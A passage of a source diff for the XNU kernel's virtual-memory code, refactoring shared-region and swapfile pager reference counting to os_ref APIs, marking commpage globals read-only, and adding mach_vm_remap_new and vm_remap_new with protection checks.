+SECURITY_READ_ONLY_LATE(ipc_port_t) commpage32_handle = IPC_PORT_NULL;
+SECURITY_READ_ONLY_LATE(ipc_port_t) commpage64_handle = IPC_PORT_NULL;
+SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage32_entry = NULL;
+SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage64_entry = NULL;
+SECURITY_READ_ONLY_LATE(vm_map_t) commpage32_map = VM_MAP_NULL;
+SECURITY_READ_ONLY_LATE(vm_map_t) commpage64_map = VM_MAP_NULL;
 
-ipc_port_t commpage_text32_handle = IPC_PORT_NULL;
-ipc_port_t commpage_text64_handle = IPC_PORT_NULL;
-vm_named_entry_t commpage_text32_entry = NULL;
-vm_named_entry_t commpage_text64_entry = NULL;
-vm_map_t commpage_text32_map = VM_MAP_NULL;
-vm_map_t commpage_text64_map = VM_MAP_NULL;
+SECURITY_READ_ONLY_LATE(ipc_port_t) commpage_text32_handle = IPC_PORT_NULL;
+SECURITY_READ_ONLY_LATE(ipc_port_t) commpage_text64_handle = IPC_PORT_NULL;
+SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage_text32_entry = NULL;
+SECURITY_READ_ONLY_LATE(vm_named_entry_t) commpage_text64_entry = NULL;
+SECURITY_READ_ONLY_LATE(vm_map_t) commpage_text32_map = VM_MAP_NULL;
+SECURITY_READ_ONLY_LATE(vm_map_t) commpage_text64_map = VM_MAP_NULL;
 
-user32_addr_t commpage_text32_location = 0;
-user64_addr_t commpage_text64_location = 0;
+SECURITY_READ_ONLY_LATE(user32_addr_t) commpage_text32_location = 0;
+SECURITY_READ_ONLY_LATE(user64_addr_t) commpage_text64_location = 0;
 
 #if defined(__i386__) || defined(__x86_64__)
 /*
@@ -3098,11 +3075,11 @@ vm_commpage_init(void)
        /* populate them according to this specific platform */
        commpage_populate();
        __commpage_setup = 1;
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (__system_power_source == 0) {
                post_sys_powersource_internal(0, 1);
        }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
        SHARED_REGION_TRACE_DEBUG(
                ("commpage: init() <-\n"));
@@ -3322,11 +3299,11 @@ vm_shared_region_slide(
        sr->sr_slide_in_progress = FALSE;
        thread_wakeup(&sr->sr_slide_in_progress);
 
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (error == KERN_SUCCESS) {
                shared_region_completed_slide = TRUE;
        }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
        vm_shared_region_unlock();
 
        vm_shared_region_deallocate(sr);
@@ -3449,19 +3426,19 @@ vm_shared_region_is_reslide(__unused struct task *task)
  * 1 if it is internal power source ie battery
  */
 void
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 post_sys_powersource(int i)
-#else
+#else /* XNU_TARGET_OS_OSX */
 post_sys_powersource(__unused int i)
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 {
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        post_sys_powersource_internal(i, 0);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 }
 
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 static void
 post_sys_powersource_internal(int i, int internal)
 {
@@ -3469,7 +3446,7 @@ post_sys_powersource_internal(int i, int internal)
                __system_power_source = i;
        }
 }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 void *
 vm_shared_region_root_dir(
index cc76069a0543b4d0dfbf1f6ddfc6afa5767f743d..bfe8682416babc0b452fbe08061125b1360cbb14 100644 (file)
@@ -58,7 +58,7 @@ extern int shared_region_debug;
 
 extern int shared_region_trace_level;
 
-extern struct vm_shared_region *init_task_shared_region;
+extern struct vm_shared_region *primary_system_shared_region;
 
 #define SHARED_REGION_TRACE_NONE_LVL            0 /* no trace */
 #define SHARED_REGION_TRACE_ERROR_LVL           1 /* trace abnormal events */
@@ -276,12 +276,6 @@ extern vm_shared_region_t vm_shared_region_trim_and_get(
        struct task             *task);
 extern void vm_shared_region_deallocate(
        struct vm_shared_region *shared_region);
-extern mach_vm_offset_t vm_shared_region_base_address(
-       struct vm_shared_region *shared_region);
-extern mach_vm_size_t vm_shared_region_size(
-       struct vm_shared_region *shared_region);
-extern ipc_port_t vm_shared_region_mem_entry(
-       struct vm_shared_region *shared_region);
 extern vm_map_t vm_shared_region_vm_map(
        struct vm_shared_region *shared_region);
 extern void vm_shared_region_set(
@@ -295,7 +289,8 @@ extern vm_shared_region_t vm_shared_region_lookup(
        boolean_t               reslide);
 extern kern_return_t vm_shared_region_start_address(
        struct vm_shared_region *shared_region,
-       mach_vm_offset_t        *start_address);
+       mach_vm_offset_t        *start_address,
+       task_t                  task);
 extern void vm_shared_region_undo_mappings(
        vm_map_t sr_map,
        mach_vm_offset_t sr_base_address,
index 3a1bb8fc94ae342412e4197d5e9f98806f02f246..3af00d6026a28f92c7119889998c92d623c7890d 100644 (file)
@@ -291,11 +291,15 @@ done:
  * the "shared_region" EMM.
  */
 typedef struct shared_region_pager {
-       struct memory_object   srp_header;          /* mandatory generic header */
+       struct memory_object    srp_header;          /* mandatory generic header */
 
        /* pager-specific data */
        queue_chain_t           srp_queue;          /* next & prev pagers */
-       uint32_t                srp_ref_count;      /* active uses */
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define srp_ref_count           srp_header.mo_ref
+#else
+       os_ref_atomic_t         srp_ref_count;      /* active uses */
+#endif
        bool                    srp_is_mapped;      /* has active mappings */
        bool                    srp_is_ready;       /* is this pager ready? */
        vm_object_t             srp_backing_object; /* VM object for shared cache */
@@ -520,7 +524,7 @@ shared_region_pager_data_request(
 
        pager = shared_region_pager_lookup(mem_obj);
        assert(pager->srp_is_ready);
-       assert(pager->srp_ref_count > 1); /* pager is alive */
+       assert(os_ref_get_count_raw(&pager->srp_ref_count) > 1); /* pager is alive */
        assert(pager->srp_is_mapped); /* pager is mapped */
 
        PAGER_DEBUG(PAGER_PAGEIN, ("shared_region_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager));
@@ -545,7 +549,7 @@ shared_region_pager_data_request(
                retval = kr;
                goto done;
        }
-       dst_object = mo_control->moc_object;
+       dst_object = memory_object_control_to_vm_object(mo_control);
        assert(dst_object != VM_OBJECT_NULL);
 
        /*
@@ -842,8 +846,7 @@ shared_region_pager_reference(
        pager = shared_region_pager_lookup(mem_obj);
 
        lck_mtx_lock(&shared_region_pager_lock);
-       assert(pager->srp_ref_count > 0);
-       pager->srp_ref_count++;
+       os_ref_retain_locked_raw(&pager->srp_ref_count, NULL);
        lck_mtx_unlock(&shared_region_pager_lock);
 }
 
@@ -890,7 +893,7 @@ shared_region_pager_terminate_internal(
 {
        assert(pager->srp_is_ready);
        assert(!pager->srp_is_mapped);
-       assert(pager->srp_ref_count == 1);
+       assert(os_ref_get_count_raw(&pager->srp_ref_count) == 1);
 
        if (pager->srp_backing_object != VM_OBJECT_NULL) {
                vm_object_deallocate(pager->srp_backing_object);
@@ -914,6 +917,7 @@ shared_region_pager_deallocate_internal(
 {
        boolean_t       needs_trimming;
        int             count_unmapped;
+       os_ref_count_t  ref_count;
 
        if (!locked) {
                lck_mtx_lock(&shared_region_pager_lock);
@@ -924,10 +928,9 @@ shared_region_pager_deallocate_internal(
        needs_trimming = (count_unmapped > shared_region_pager_cache_limit);
 
        /* drop a reference on this pager */
-       assert(pager->srp_ref_count > 0);
-       pager->srp_ref_count--;
+       ref_count = os_ref_release_locked_raw(&pager->srp_ref_count, NULL);
 
-       if (pager->srp_ref_count == 1) {
+       if (ref_count == 1) {
                /*
                 * Only the "named" reference is left, which means that
                 * no one is really holding on to this pager anymore.
@@ -937,7 +940,7 @@ shared_region_pager_deallocate_internal(
                /* the pager is all ours: no need for the lock now */
                lck_mtx_unlock(&shared_region_pager_lock);
                shared_region_pager_terminate_internal(pager);
-       } else if (pager->srp_ref_count == 0) {
+       } else if (ref_count == 0) {
                /*
                 * Dropped the existence reference;  the memory object has
                 * been terminated.  Do some final cleanup and release the
@@ -1052,10 +1055,10 @@ shared_region_pager_map(
 
        lck_mtx_lock(&shared_region_pager_lock);
        assert(pager->srp_is_ready);
-       assert(pager->srp_ref_count > 0); /* pager is alive */
+       assert(os_ref_get_count_raw(&pager->srp_ref_count) > 0); /* pager is alive */
        if (!pager->srp_is_mapped) {
                pager->srp_is_mapped = TRUE;
-               pager->srp_ref_count++;
+               os_ref_retain_locked_raw(&pager->srp_ref_count, NULL);
                shared_region_pager_count_mapped++;
        }
        lck_mtx_unlock(&shared_region_pager_lock);
@@ -1133,7 +1136,7 @@ shared_region_pager_lookup(
 
        assert(mem_obj->mo_pager_ops == &shared_region_pager_ops);
        pager = (shared_region_pager_t)(uintptr_t) mem_obj;
-       assert(pager->srp_ref_count > 0);
+       assert(os_ref_get_count_raw(&pager->srp_ref_count) > 0);
        return pager;
 }
 
@@ -1173,8 +1176,8 @@ shared_region_pager_create(
        pager->srp_header.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
        pager->srp_is_ready = FALSE;/* not ready until it has a "name" */
-       pager->srp_ref_count = 1;   /* existence reference (for the cache) */
-       pager->srp_ref_count++;     /* for the caller */
+       /* existence reference (for the cache) + 1 for the caller */
+       os_ref_init_count_raw(&pager->srp_ref_count, NULL, 2);
        pager->srp_is_mapped = FALSE;
        pager->srp_backing_object = backing_object;
        pager->srp_backing_offset = backing_offset;
@@ -1318,7 +1321,8 @@ shared_region_pager_match(
                if (memcmp(si->si_slide_info_entry, slide_info->si_slide_info_entry, si->si_slide_info_size) != 0) {
                        continue;
                }
-               ++pager->srp_ref_count; /* the caller expects a reference on this */
+               /* the caller expects a reference on this */
+               os_ref_retain_locked_raw(&pager->srp_ref_count, NULL);
                lck_mtx_unlock(&shared_region_pager_lock);
                return (memory_object_t)pager;
        }
@@ -1366,7 +1370,7 @@ shared_region_pager_trim(void)
                /* get prev elt before we dequeue */
                prev_pager = (shared_region_pager_t)queue_prev(&pager->srp_queue);
 
-               if (pager->srp_ref_count == 2 &&
+               if (os_ref_get_count_raw(&pager->srp_ref_count) == 2 &&
                    pager->srp_is_ready &&
                    !pager->srp_is_mapped) {
                        /* this pager can be trimmed */
@@ -1401,13 +1405,13 @@ shared_region_pager_trim(void)
                    srp_queue);
                pager->srp_queue.next = NULL;
                pager->srp_queue.prev = NULL;
-               assert(pager->srp_ref_count == 2);
+               assert(os_ref_get_count_raw(&pager->srp_ref_count) == 2);
                /*
                 * We can't call deallocate_internal() because the pager
                 * has already been dequeued, but we still need to remove
                 * a reference.
                 */
-               pager->srp_ref_count--;
+               (void)os_ref_release_locked_raw(&pager->srp_ref_count, NULL);
                shared_region_pager_terminate_internal(pager);
        }
 }
index 388d0fb569162029fc4e03f27e106fd0a03c3dfb..677b2b0ce13b24f9d91be0ce3b381355cbcda48c 100644 (file)
@@ -137,13 +137,17 @@ const struct memory_object_pager_ops swapfile_pager_ops = {
  */
 typedef struct swapfile_pager {
        /* mandatory generic header */
-       struct memory_object swp_pgr_hdr;
+       struct memory_object    swp_pgr_hdr;
 
        /* pager-specific data */
        queue_chain_t           pager_queue;    /* next & prev pagers */
-       unsigned int            ref_count;      /* reference count */
-       boolean_t               is_ready;       /* is this pager ready ? */
-       boolean_t               is_mapped;      /* is this pager mapped ? */
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define swp_pgr_hdr_ref         swp_pgr_hdr.mo_ref
+#else
+       os_ref_atomic_t         swp_pgr_hdr_ref;      /* reference count */
+#endif
+       bool                    is_ready;       /* is this pager ready ? */
+       bool                    is_mapped;      /* is this pager mapped ? */
        struct vnode            *swapfile_vnode;/* the swapfile's vnode */
 } *swapfile_pager_t;
 #define SWAPFILE_PAGER_NULL     ((swapfile_pager_t) NULL)
@@ -320,7 +324,7 @@ swapfile_pager_data_request(
 
        pager = swapfile_pager_lookup(mem_obj);
        assert(pager->is_ready);
-       assert(pager->ref_count > 1); /* pager is alive and mapped */
+       assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 1); /* pager is alive and mapped */
 
        PAGER_DEBUG(PAGER_PAGEIN, ("swapfile_pager_data_request: %p, %llx, %x, %x, pager %p\n", mem_obj, offset, length, protection_required, pager));
 
@@ -344,7 +348,7 @@ swapfile_pager_data_request(
                retval = kr;
                goto done;
        }
-       dst_object = mo_control->moc_object;
+       dst_object = memory_object_control_to_vm_object(mo_control);
        assert(dst_object != VM_OBJECT_NULL);
 
 
@@ -482,8 +486,7 @@ swapfile_pager_reference(
        pager = swapfile_pager_lookup(mem_obj);
 
        lck_mtx_lock(&swapfile_pager_lock);
-       assert(pager->ref_count > 0);
-       pager->ref_count++;
+       os_ref_retain_locked_raw(&pager->swp_pgr_hdr_ref, NULL);
        lck_mtx_unlock(&swapfile_pager_lock);
 }
 
@@ -552,14 +555,16 @@ swapfile_pager_deallocate_internal(
        swapfile_pager_t        pager,
        boolean_t               locked)
 {
+       os_ref_count_t ref_count;
+
        if (!locked) {
                lck_mtx_lock(&swapfile_pager_lock);
        }
 
        /* drop a reference on this pager */
-       pager->ref_count--;
+       ref_count = os_ref_release_locked_raw(&pager->swp_pgr_hdr_ref, NULL);
 
-       if (pager->ref_count == 1) {
+       if (ref_count == 1) {
                /*
                 * Only the "named" reference is left, which means that
                 * no one is really holding on to this pager anymore.
@@ -569,7 +574,7 @@ swapfile_pager_deallocate_internal(
                /* the pager is all ours: no need for the lock now */
                lck_mtx_unlock(&swapfile_pager_lock);
                swapfile_pager_terminate_internal(pager);
-       } else if (pager->ref_count == 0) {
+       } else if (ref_count == 0) {
                /*
                 * Dropped the existence reference;  the memory object has
                 * been terminated.  Do some final cleanup and release the
@@ -657,7 +662,7 @@ swapfile_pager_map(
 
        lck_mtx_lock(&swapfile_pager_lock);
        assert(pager->is_ready);
-       assert(pager->ref_count > 0); /* pager is alive */
+       assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 0); /* pager is alive */
        if (pager->is_mapped == FALSE) {
                /*
                 * First mapping of this pager:  take an extra reference
@@ -665,7 +670,7 @@ swapfile_pager_map(
                 * are removed.
                 */
                pager->is_mapped = TRUE;
-               pager->ref_count++;
+               os_ref_retain_locked_raw(&pager->swp_pgr_hdr_ref, NULL);
        }
        lck_mtx_unlock(&swapfile_pager_lock);
 
@@ -716,7 +721,7 @@ swapfile_pager_lookup(
 
        assert(mem_obj->mo_pager_ops == &swapfile_pager_ops);
        __IGNORE_WCASTALIGN(pager = (swapfile_pager_t) mem_obj);
-       assert(pager->ref_count > 0);
+       assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 0);
        return pager;
 }
 
@@ -745,7 +750,7 @@ swapfile_pager_create(
        pager->swp_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL;
 
        pager->is_ready = FALSE;/* not ready until it has a "name" */
-       pager->ref_count = 1;   /* setup reference */
+       os_ref_init_raw(&pager->swp_pgr_hdr_ref, NULL);   /* setup reference */
        pager->is_mapped = FALSE;
        pager->swapfile_vnode = vp;
 
@@ -762,7 +767,7 @@ swapfile_pager_create(
        if (!queue_end(&swapfile_pager_queue,
            (queue_entry_t) pager2)) {
                /* while we hold the lock, transfer our setup ref to winner */
-               pager2->ref_count++;
+               os_ref_retain_locked_raw(&pager2->swp_pgr_hdr_ref, NULL);
                /* we lost the race, down with the loser... */
                lck_mtx_unlock(&swapfile_pager_lock);
                pager->swapfile_vnode = NULL;
@@ -831,7 +836,7 @@ swapfile_pager_setup(
                pager = SWAPFILE_PAGER_NULL;
        } else {
                /* make sure pager doesn't disappear */
-               pager->ref_count++;
+               os_ref_retain_raw(&pager->swp_pgr_hdr_ref, NULL);
        }
 
        lck_mtx_unlock(&swapfile_pager_lock);
index cda7e0ba134db0a9f0ccf5e0af70a126c1300574..6e288f8c7009b01346d3ad4725c3f1cb85829fd0 100644 (file)
@@ -892,17 +892,19 @@ vm_test_map_copy_adjust_to_target(void)
        mach_memory_entry_port_release(mem_entry);
 
        /* create 4k copy map */
+       curprot = VM_PROT_NONE;
+       maxprot = VM_PROT_NONE;
        kr = vm_map_copy_extract(map4k, addr4k, 0x3000,
-           VM_PROT_READ, FALSE,
-           &copy4k, &curprot, &maxprot,
+           FALSE, &copy4k, &curprot, &maxprot,
            VM_INHERIT_DEFAULT, VM_MAP_KERNEL_FLAGS_NONE);
        assert(kr == KERN_SUCCESS);
        assert(copy4k->size == 0x3000);
 
        /* create 16k copy map */
+       curprot = VM_PROT_NONE;
+       maxprot = VM_PROT_NONE;
        kr = vm_map_copy_extract(map16k, addr16k, 0x4000,
-           VM_PROT_READ, FALSE,
-           &copy16k, &curprot, &maxprot,
+           FALSE, &copy16k, &curprot, &maxprot,
            VM_INHERIT_DEFAULT, VM_MAP_KERNEL_FLAGS_NONE);
        assert(kr == KERN_SUCCESS);
        assert(copy16k->size == 0x4000);
index 360289f4757b7d1e071b0c2e35beb56d544edcec..2682dfaaf1b733d15953ffcf463aa4967420961f 100644 (file)
@@ -1184,6 +1184,91 @@ vm_map_kernel(
        return kr;
 }
 
+/*
+ * mach_vm_remap_new -
+ * Behaves like mach_vm_remap, except that VM_FLAGS_RETURN_DATA_ADDR is always set
+ * and {cur,max}_protection are in/out.
+ */
+kern_return_t
+mach_vm_remap_new_external(
+       vm_map_t                target_map,
+       mach_vm_offset_t        *address,
+       mach_vm_size_t  size,
+       mach_vm_offset_t        mask,
+       int                     flags,
+       mach_port_t             src_tport,
+       mach_vm_offset_t        memory_address,
+       boolean_t               copy,
+       vm_prot_t               *cur_protection,   /* IN/OUT */
+       vm_prot_t               *max_protection,   /* IN/OUT */
+       vm_inherit_t            inheritance)
+{
+       vm_tag_t tag;
+       vm_map_offset_t         map_addr;
+       kern_return_t           kr;
+       vm_map_t src_map;
+
+       flags |= VM_FLAGS_RETURN_DATA_ADDR;
+       VM_GET_FLAGS_ALIAS(flags, tag);
+
+       /* filter out any kernel-only flags */
+       if (flags & ~VM_FLAGS_USER_REMAP) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       if (target_map == VM_MAP_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       if ((*cur_protection & ~VM_PROT_ALL) ||
+           (*max_protection & ~VM_PROT_ALL) ||
+           (*cur_protection & *max_protection) != *cur_protection) {
+               return KERN_INVALID_ARGUMENT;
+       }
+       if ((*max_protection & (VM_PROT_WRITE | VM_PROT_EXECUTE)) ==
+           (VM_PROT_WRITE | VM_PROT_EXECUTE)) {
+               /*
+                * XXX FBDP TODO
+                * enforce target's "wx" policies
+                */
+               return KERN_PROTECTION_FAILURE;
+       }
+
+       if (copy || *max_protection == VM_PROT_READ || *max_protection == VM_PROT_NONE) {
+               src_map = convert_port_to_map_read(src_tport);
+       } else {
+               src_map = convert_port_to_map(src_tport);
+       }
+
+       if (src_map == VM_MAP_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       map_addr = (vm_map_offset_t)*address;
+
+       kr = vm_map_remap(target_map,
+           &map_addr,
+           size,
+           mask,
+           flags,
+           VM_MAP_KERNEL_FLAGS_NONE,
+           tag,
+           src_map,
+           memory_address,
+           copy,
+           cur_protection,    /* IN/OUT */
+           max_protection,    /* IN/OUT */
+           inheritance);
+
+       *address = map_addr;
+       vm_map_deallocate(src_map);
+
+       if (kr == KERN_SUCCESS) {
+               ipc_port_release_send(src_tport);  /* consume on success */
+       }
+       return kr;
+}
+
 /*
  * mach_vm_remap -
  * Remap a range of memory from one task into another,
@@ -1201,8 +1286,8 @@ mach_vm_remap_external(
        vm_map_t                src_map,
        mach_vm_offset_t        memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,    /* OUT */
+       vm_prot_t               *max_protection,    /* OUT */
        vm_inherit_t            inheritance)
 {
        vm_tag_t tag;
@@ -1223,8 +1308,8 @@ mach_vm_remap_kernel(
        vm_map_t                src_map,
        mach_vm_offset_t        memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,   /* OUT */
+       vm_prot_t               *max_protection,   /* OUT */
        vm_inherit_t            inheritance)
 {
        vm_map_offset_t         map_addr;
@@ -1241,6 +1326,9 @@ mach_vm_remap_kernel(
 
        map_addr = (vm_map_offset_t)*address;
 
+       *cur_protection = VM_PROT_NONE;
+       *max_protection = VM_PROT_NONE;
+
        kr = vm_map_remap(target_map,
            &map_addr,
            size,
@@ -1251,13 +1339,98 @@ mach_vm_remap_kernel(
            src_map,
            memory_address,
            copy,
-           cur_protection,
-           max_protection,
+           cur_protection,    /* IN/OUT */
+           max_protection,    /* IN/OUT */
            inheritance);
        *address = map_addr;
        return kr;
 }
 
+/*
+ * vm_remap_new -
+ * Behaves like vm_remap, except that VM_FLAGS_RETURN_DATA_ADDR is always set
+ * and {cur,max}_protection are in/out.
+ */
+kern_return_t
+vm_remap_new_external(
+       vm_map_t                target_map,
+       vm_offset_t             *address,
+       vm_size_t               size,
+       vm_offset_t             mask,
+       int                     flags,
+       mach_port_t             src_tport,
+       vm_offset_t             memory_address,
+       boolean_t               copy,
+       vm_prot_t               *cur_protection,       /* IN/OUT */
+       vm_prot_t               *max_protection,       /* IN/OUT */
+       vm_inherit_t            inheritance)
+{
+       vm_tag_t tag;
+       vm_map_offset_t         map_addr;
+       kern_return_t           kr;
+       vm_map_t src_map;
+
+       flags |= VM_FLAGS_RETURN_DATA_ADDR;
+       VM_GET_FLAGS_ALIAS(flags, tag);
+
+       /* filter out any kernel-only flags */
+       if (flags & ~VM_FLAGS_USER_REMAP) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       if (target_map == VM_MAP_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       if ((*cur_protection & ~VM_PROT_ALL) ||
+           (*max_protection & ~VM_PROT_ALL) ||
+           (*cur_protection & *max_protection) != *cur_protection) {
+               return KERN_INVALID_ARGUMENT;
+       }
+       if ((*max_protection & (VM_PROT_WRITE | VM_PROT_EXECUTE)) ==
+           (VM_PROT_WRITE | VM_PROT_EXECUTE)) {
+               /*
+                * XXX FBDP TODO
+                * enforce target's "wx" policies
+                */
+               return KERN_PROTECTION_FAILURE;
+       }
+
+       if (copy || *max_protection == VM_PROT_READ || *max_protection == VM_PROT_NONE) {
+               src_map = convert_port_to_map_read(src_tport);
+       } else {
+               src_map = convert_port_to_map(src_tport);
+       }
+
+       if (src_map == VM_MAP_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       map_addr = (vm_map_offset_t)*address;
+
+       kr = vm_map_remap(target_map,
+           &map_addr,
+           size,
+           mask,
+           flags,
+           VM_MAP_KERNEL_FLAGS_NONE,
+           tag,
+           src_map,
+           memory_address,
+           copy,
+           cur_protection,   /* IN/OUT */
+           max_protection,   /* IN/OUT */
+           inheritance);
+
+       *address = CAST_DOWN(vm_offset_t, map_addr);
+       vm_map_deallocate(src_map);
+
+       if (kr == KERN_SUCCESS) {
+               ipc_port_release_send(src_tport); /* consume on success */
+       }
+       return kr;
+}
+
 /*
  * vm_remap -
  * Remap a range of memory from one task into another,
@@ -1279,8 +1452,8 @@ vm_remap_external(
        vm_map_t                src_map,
        vm_offset_t             memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,    /* OUT */
+       vm_prot_t               *max_protection,    /* OUT */
        vm_inherit_t            inheritance)
 {
        vm_tag_t tag;
@@ -1301,8 +1474,8 @@ vm_remap_kernel(
        vm_map_t                src_map,
        vm_offset_t             memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,    /* OUT */
+       vm_prot_t               *max_protection,    /* OUT */
        vm_inherit_t            inheritance)
 {
        vm_map_offset_t         map_addr;
@@ -1319,6 +1492,9 @@ vm_remap_kernel(
 
        map_addr = (vm_map_offset_t)*address;
 
+       *cur_protection = VM_PROT_NONE;
+       *max_protection = VM_PROT_NONE;
+
        kr = vm_map_remap(target_map,
            &map_addr,
            size,
@@ -1329,8 +1505,8 @@ vm_remap_kernel(
            src_map,
            memory_address,
            copy,
-           cur_protection,
-           max_protection,
+           cur_protection,   /* IN/OUT */
+           max_protection,   /* IN/OUT */
            inheritance);
        *address = CAST_DOWN(vm_offset_t, map_addr);
        return kr;
@@ -1375,8 +1551,6 @@ mach_vm_wire_kernel(
                return KERN_INVALID_HOST;
        }
 
-       assert(host_priv == &realhost);
-
        if (map == VM_MAP_NULL) {
                return KERN_INVALID_TASK;
        }
@@ -1426,8 +1600,6 @@ vm_wire(
                return KERN_INVALID_HOST;
        }
 
-       assert(host_priv == &realhost);
-
        if (map == VM_MAP_NULL) {
                return KERN_INVALID_TASK;
        }
@@ -2099,7 +2271,10 @@ mach_vm_page_range_query(
        effective_page_size = (1 << effective_page_shift);
        effective_page_mask = effective_page_size - 1;
 
-       disp_buf_req_size = (*dispositions_count * sizeof(int));
+       if (os_mul_overflow(*dispositions_count, sizeof(int), &disp_buf_req_size)) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
        start = vm_map_trunc_page(address, effective_page_mask);
        end = vm_map_round_page(address + size, effective_page_mask);
 
@@ -2296,7 +2471,7 @@ kern_return_t
 mach_make_memory_entry_64(
        vm_map_t                target_map,
        memory_object_size_t    *size,
-       memory_object_offset_t offset,
+       memory_object_offset_t  offset,
        vm_prot_t               permission,
        ipc_port_t              *object_handle,
        ipc_port_t              parent_handle)
@@ -2674,7 +2849,6 @@ mach_make_memory_entry_internal(
                vm_prot_t       cur_prot, max_prot;
                vm_map_kernel_flags_t vmk_flags;
                vm_map_entry_t parent_copy_entry;
-               vm_prot_t required_protection;
 
                if (target_map == VM_MAP_NULL) {
                        DEBUG4K_MEMENTRY("map %p offset 0x%llx size 0x%llx prot 0x%x -> entry %p kr 0x%x\n", target_map, offset, *size, permission, user_entry, KERN_INVALID_TASK);
@@ -2685,6 +2859,42 @@ mach_make_memory_entry_internal(
                vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
                parent_copy_entry = VM_MAP_ENTRY_NULL;
                if (!(permission & MAP_MEM_VM_SHARE)) {
+                       vm_map_t tmp_map, real_map;
+                       vm_map_version_t version;
+                       vm_object_t tmp_object;
+                       vm_object_offset_t obj_off;
+                       vm_prot_t prot;
+                       boolean_t wired;
+                       bool contended;
+
+                       /* resolve any pending submap copy-on-write... */
+                       if (protections & VM_PROT_WRITE) {
+                               tmp_map = target_map;
+                               vm_map_lock_read(tmp_map);
+                               kr = vm_map_lookup_locked(&tmp_map,
+                                   map_start,
+                                   protections | mask_protections,
+                                   OBJECT_LOCK_EXCLUSIVE,
+                                   &version,
+                                   &tmp_object,
+                                   &obj_off,
+                                   &prot,
+                                   &wired,
+                                   NULL,                       /* fault_info */
+                                   &real_map,
+                                   &contended);
+                               if (kr != KERN_SUCCESS) {
+                                       vm_map_unlock_read(tmp_map);
+                               } else {
+                                       vm_object_unlock(tmp_object);
+                                       vm_map_unlock_read(tmp_map);
+                                       if (real_map != tmp_map) {
+                                               vm_map_unlock_read(real_map);
+                                       }
+                               }
+                       }
+                       /* ... and carry on */
+
                        /* stop extracting if VM object changes */
                        vmk_flags.vmkf_copy_single_object = TRUE;
                        if ((permission & MAP_MEM_NAMED_REUSE) &&
@@ -2718,15 +2928,16 @@ mach_make_memory_entry_internal(
                         * caller is asking for whichever proctections are
                         * available: no required protections.
                         */
-                       required_protection = VM_PROT_NONE;
+                       cur_prot = VM_PROT_NONE;
+                       max_prot = VM_PROT_NONE;
                } else {
                        /*
                         * Caller wants a memory entry with "protections".
                         * Make sure we extract only memory that matches that.
                         */
-                       required_protection = protections;
+                       cur_prot = protections;
+                       max_prot = protections;
                }
-               cur_prot = VM_PROT_ALL;
                if (target_map->pmap == kernel_pmap) {
                        /*
                         * Get "reserved" map entries to avoid deadlocking
@@ -2743,7 +2954,6 @@ mach_make_memory_entry_internal(
                kr = vm_map_copy_extract(target_map,
                    map_start,
                    map_size,
-                   required_protection,
                    FALSE,                      /* copy */
                    &copy,
                    &cur_prot,
@@ -2758,7 +2968,6 @@ mach_make_memory_entry_internal(
                        return kr;
                }
                assert(copy != VM_MAP_COPY_NULL);
-               assert((cur_prot & required_protection) == required_protection);
 
                if (mask_protections) {
                        /*
@@ -2780,6 +2989,9 @@ mach_make_memory_entry_internal(
                         * We want exactly "original_protections"
                         * out of "cur_prot".
                         */
+                       assert((cur_prot & protections) == protections);
+                       assert((max_prot & protections) == protections);
+                       /* XXX FBDP TODO: no longer needed? */
                        if ((cur_prot & protections) != protections) {
                                if (VM_MAP_PAGE_SHIFT(target_map) < PAGE_SHIFT) {
 //                                     panic("DEBUG4K %s:%d kr 0x%x\n", __FUNCTION__, __LINE__, KERN_PROTECTION_FAILURE);
@@ -2948,10 +3160,8 @@ mach_make_memory_entry_internal(
 
        if (parent_entry->is_sub_map) {
                vm_map_t map = parent_entry->backing.map;
+               vm_map_reference(map);
                user_entry->backing.map = map;
-               lck_mtx_lock(&map->s_lock);
-               os_ref_retain_locked(&map->map_refcnt);
-               lck_mtx_unlock(&map->s_lock);
        } else {
                object = vm_named_entry_to_vm_object(parent_entry);
                assert(object != VM_OBJECT_NULL);
@@ -3516,7 +3726,7 @@ mach_memory_entry_phys_page_offset(
                return KERN_INVALID_ARGUMENT;
        }
 
-       mem_entry = (vm_named_entry_t) entry_port->ip_kobject;
+       mem_entry = (vm_named_entry_t) ipc_kobject_get(entry_port);
 
        named_entry_lock(mem_entry);
 
